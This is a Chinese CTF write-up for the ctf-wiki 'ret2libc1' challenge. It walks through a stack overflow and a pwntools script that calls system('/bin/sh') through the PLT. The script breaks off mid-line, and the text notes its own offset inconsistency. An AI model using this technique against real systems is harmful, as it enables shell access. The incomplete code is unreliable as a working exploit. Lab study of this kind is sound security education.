题目链接 : https://github.com/ctf-wiki/ctf-challenges
ret2libc1
checksec 一下，只开了 NX 和部分 RELRO（Partial RELRO）。NX 使栈不可执行，因此不能直接在栈上放 shellcode，只能复用程序中已有的代码和数据。
main函数
secure函数
存在栈溢出；plt 表里有 system 函数的地址，程序中也有 /bin/sh 字符串，因此 payload 已经可以构造出来了。
offset = 0x64（注意：下面脚本中实际使用的是 offset = 108，即 0x6c，两处不一致；0x64 可能是反编译器显示的相对 ebp 的偏移，实际偏移应以调试结果为准）
1 from pwn import *
2
3 io = process('./ret2libc1')
4
5 elf = ELF('./ret2libc1')
6
7 system_plt_addr = elf.plt['system']
8 binsh_addr = next(elf.search(b"/bin/sh"))
9 offset = 108
10
11 print('system_plt_addr:',system_plt_addr)
12 print('binsh_addr : ',binsh_addr)
13 #payload = flat([b'a'*(offset+4),system_plt_addr,p32(0),binsh_addr])
14 payload = b'a'*(offset+4